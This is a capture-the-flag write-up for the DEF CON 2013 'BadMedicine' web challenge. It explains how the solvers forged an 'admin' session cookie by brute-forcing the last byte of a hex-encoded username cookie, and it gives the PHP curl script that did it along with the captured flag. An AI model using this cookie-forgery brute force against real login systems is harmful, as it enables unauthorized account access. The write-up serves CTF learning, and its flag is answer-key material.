Writeup: DEF CON 2013 - BadMedicine

ZeroOFFset

17-06-2013 (Updated: 13-12-2020)

writeups

ctf, defcon, web, writeups

Information

Category: web

Writeup

Challenge was available at
http://badmedicine.shallweplayaga.me:8042 where we found a login form:

We tried a simple login and we got to this page:

So we were in the right place but with the wrong credentials.

Looking at cookies we found this:

username=32c93a9a8168a1563709

This cookie, seen has hex value has the same number of byte as the inserted username, but ASCII codes is messed up.

So we logged in as "admi", copied the cookie and brute-forced last character with this script:

// Bruteforce to find the 'n'
for($c=0; $c<256; $c++) {
  echo "\rTrying $c...";
  $cookie = sprintf("username=09c8259c%02x", $c);
  $ch = curl_init('http://badmedicine.shallweplayaga.me:8042/welcome');
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_HEADER, 1);
  curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  $res = curl_exec($ch);
  if(preg_match('/The key is:\s+([\w ]+)/', $res, $key)) {
    echo "\rKey FOUND: {$key[1]}".PHP_EOL;
    exit;
  }
}

And the key simply came up:

Flag

1	Key FOUND: who wants oatmeal raisin anyways twumpAdby